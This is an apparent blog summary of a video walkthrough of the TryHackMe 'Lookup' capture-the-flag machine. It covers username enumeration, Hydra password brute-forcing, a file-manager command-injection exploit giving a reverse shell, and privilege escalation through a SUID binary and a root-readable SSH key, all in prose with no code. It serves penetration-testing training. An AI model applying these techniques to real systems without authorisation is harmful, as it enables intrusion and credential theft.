From Basic Enumeration to Root | TryHackMe Lookup

In this post, we have a TryHackMe boot-to-root machine named lookup. In this machine, we go through the typical steps by starting with Nmap scanning and enumeration. We find a login form. We decided to create a python script to find the correct username and then use Hydra to find the password. After successful authentication, we have a file manager hosted on a subdomain and the version of this web application is vulnerable to a php command injection. The exploit can be run through Metasploit to obtain initial foothold as www-data. We move horizontally first by exploiting a misconfigured Linux binary then we use GTFObins to obtain root.

Offensive Security Certified Professional Study Notes and Guide

HackTheBox Certified Penetration Testing Specialist (CPTS) Study Notes

1. Initial Scanning

• The presenter starts with an Nmap scan to identify open ports and services on the target machine. The scan reveals:
• Port 22: SSH
• Port 80: HTTP
• Aggressive scanning is used since this is a test environment, avoiding triggering production firewalls.

2. Web Application Enumeration

• Accessing the web service on port 80 reveals a login form. The domain is added to the host file for accessibility.
• Attempts are made to log in using default credentials (admin:admin), but they fail.
• Using Burp Suite, the presenter intercepts HTTP requests and identifies differences in server responses for valid and invalid usernames and passwords.

3. Brute Force Attack

• A Python script is created to enumerate valid usernames using server responses.
• The script identifies two valid usernames: admin and Jose.
• Hydra is used to brute-force the password for the user Jose, resulting in the discovery of the password: password123.

4. Exploitation of the Web Application

• After logging in as Jose, the interface displays a file manager with various files.
• The presenter identifies a file named credentials, containing a username (think) but no password.
• Information about the web application (Linder) reveals it is vulnerable to exploitation.
• Using SearchSploit, the presenter finds an exploit matching the application’s version and uses it to gain a reverse shell on the machine.

5. Privilege Escalation

• The initial shell runs as the www-data user. The goal is to escalate to think and then root.
• Exploring the system reveals a SUID binary named pwm. This binary executes commands with elevated privileges.
• By creating a fake id command, the presenter tricks pwm into believing it is running as think. This grants access to think‘s home directory and a file named passwords.

6. Further Enumeration and Root Escalation

• Using the discovered passwords, Hydra brute-forces SSH credentials for think.
• Logging in as think, enumeration reveals the user can execute a binary (look) as root.
• The binary allows accessing sensitive files, including the root user’s private SSH key.
• Using the key, the presenter logs in as root and retrieves both user and root flags.

Key Techniques Demonstrated

• Reconnaissance: Utilizing Nmap and Burp Suite for initial scans and enumeration.
• Brute Forcing: Using custom scripts and tools like Hydra to discover credentials.
• Exploitation: Identifying and exploiting vulnerabilities using tools like SearchSploit.
• Privilege Escalation: Employing creative methods like SUID binary exploitation and file access to gain root access.

TryHackMe Lookup | Room Answers

Room answers can be found here.

Video Walkthrough